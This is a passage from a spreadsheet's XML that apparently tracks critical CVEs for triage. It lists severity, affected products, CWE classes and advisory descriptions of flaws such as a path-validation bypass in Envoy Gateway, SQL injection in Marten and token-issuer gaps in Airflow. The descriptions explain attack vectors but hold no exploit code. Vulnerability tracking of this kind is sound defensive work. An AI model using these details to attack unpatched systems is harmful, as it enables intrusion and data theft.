      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45764</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a protocol change while processing HTTP/2 traffic could lead to type confusion in Suricata. Crafted traffic may cause Suricata to crash, resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable HTTP/2 parsing if it is not required.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45764</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49364</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated network-adjacent attacker can leverage discovery to capture cluster administrative credentials during the initial cluster connection handshake.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49364</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53713</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.7.4 and 1.8.1, to_absolute_normalized_path in internal/gatewayapi/luavalidator/security.lua does not collapse redundant separators before is_critical_path evaluates Lua submitted through EnvoyExtensionPolicy during default Strict validation. Linux resolves a double-slash absolute path as the corresponding single-slash path, but the validator does not match the redundant-separator form, allowing submitted Lua to read arbitrary files from the gateway controller pod. Exposed files can include Kubernetes service-account tokens, TLS certificates, and process environment data, and the disclosed credentials can provide access to sensitive Kubernetes API Server or Gateway xDS server information. This issue is fixed in versions 1.7.4 and 1.8.1.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53713</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61594</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M115" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the live (WebSocket) transport authorizes a mount via `check_view_auth`, not Django's `View.dispatch()` chain. As a result, standard Django authorization — `LoginRequiredMixin`, `PermissionRequiredMixin`, `UserPassesTestMixin`, `@method_decorator(login_required, name="dispatch")`, and custom `dispatch()` guards — and the djust admin extension's staff gate (applied only in the HTTP `as_view` wrapper) were enforced on the initial HTTP GET but silently bypassed over WebSocket, where all events and state flow. An anonymous or under-privileged client could open a WebSocket and mount such a view — including admin list/create/change/delete — and dispatch its handlers. This is fixed in djust 1.0.7. `check_view_auth` now honors the Django `AccessMixin` family on every transport; a new system check S004 fails loud at startup on auth patterns the runtime cannot safely replay (decorator/overridden-`dispatch` forms); and the admin base mixin declares `login_required = True` + an active-staff `check_permissions` gate. As a workaround, gate views using djust's `login_required` / `permission_required` / `check_permissions` attributes (honored on all transports) rather than HTTP-only mixins/decorators.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61594</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67593</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>A remote attacker can craft an Openwire RemoveSubscriptionInfo command to cause the deletion of a queue on the Artemis broker before the connection authentication and authorization stage or at any time thereafter. 
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67593</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.
The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75513</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>Marten is a .NET Transactional Document DB and Event Store on PostgreSQL. From version 7.0.0 until 9.13.0, several Marten LINQ and tenant-management paths interpolate runtime, potentially attacker-controlled strings into single-quoted SQL literals without escaping or parameterization. The primary confirmed vector is a dictionary indexer key used by Where filters in src/Marten/Linq/Members/Dictionaries/DictionaryItemMember.cs. Additional affected sinks include SelectParser.cs, DatabaseScopedTenantPartitions.cs, and DeleteAllForTenant.cs reached through IEventStore.DeleteProjectionProgressAsync, while DictionaryContainsKeyFilter.cs (Newtonsoft serializer only; System.Text.Json is not affected) handles ContainsKey calls. Events/Daemon/Internals/EventLoader.cs contains a related per-tenant partition-pruning literal that the advisory identifies as a defense-in-depth sink. A crafted single quote can escape the generated literal, enabling filter or multi-tenant authorization bypass and blind data exfiltration, and deployments that permit semicolon-batched Npgsql statements may also allow data modification. This issue is fixed in version 9.13.0.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75513</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77408</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, the writeShortstr function in write.go casts the byte length of AMQP shortstr property values to uint8 without first rejecting values longer than 255 bytes. An application that accepts an oversized CorrelationId, ReplyTo, MessageId, Expiration, UserId, AppId, ContentType, ContentEncoding, or Type value can therefore serialize a wrapped length and only a truncated prefix, while reporting no error. The resulting silent metadata corruption can break request and reply correlation, routing, tracing, and downstream message processing. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77408</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78299</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Embedded CDT versions 6.0 to 6.7 if the CMSIS-Pack archive extracts a compromised CMSIS pack the archive extraction can extract files to locations outside of the pack, allowing writing of arbitrary files to other locations on disk.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78299</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80424</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to create arbitrary files due to path traversal during archive extraction.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80424</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81642</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>In NLnet Labs Unbound up to and including 1.26.0, a vulnerability was found in the DNSSEC validator that enables denial of service and possible remote code execution as a result of digesting DNSKEYs. A DNSKEY with an owner compression pointer to its own RDATA can overflow the digest buffer. Remote code execution is possible through attacker controlled data. An adversary can exploit the vulnerability by controlling a malicious zone and querying a vulnerable Unbound.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81642</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84625</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, visionOS 27, watchOS 27. An app may be able to fingerprint the user.</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84625</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85597</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>Traefik before v2.11.55 and v3.0.0 through v3.7.10 contain a TLS option conflict resolution vulnerability that allows unauthenticated attackers to bypass client-certificate authentication by creating conflicting TLS options on multi-host routers. Attackers can reach protected backends by exploiting shared TLS resolution across multiple hostnames in a single router rule, causing the strict mTLS requirement to fall back to default options for all hosts.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85597</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86881</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>A certificate validation issue was addressed with improved certificate validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An attacker with a compromised intermediate certificate authority may be able to issue certificates with arbitrary extended key usages.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86881</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89779</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: validate ef-&gt;size covers the record's name and value
When an EA record has a non-zero ef-&gt;size, ntfs_read_ea() only checks
that the record fits in the remaining buffer (ea_size &gt; bytes), not that
ef-&gt;size is large enough to hold the record's own name_len + 1 + elength.
A crafted image can pass validation with, e.g., ef-&gt;size = 24 but
elength = 0xffff. ntfs_get_ea() then trusts elength and copies it out of
the undersized record, reading past the kmalloc(info-&gt;size) allocation
and leaking heap memory to userspace via getxattr():
 BUG: KASAN: slab-out-of-bounds in ntfs_get_ea (fs/ntfs3/xattr.c:302)
 Read of size 65535 at addr ffff888100794550 by task exploit
  __asan_memcpy (mm/kasan/shadow.c:105)
  ntfs_get_ea (fs/ntfs3/xattr.c:302)
  ntfs_getxattr (fs/ntfs3/xattr.c:848)
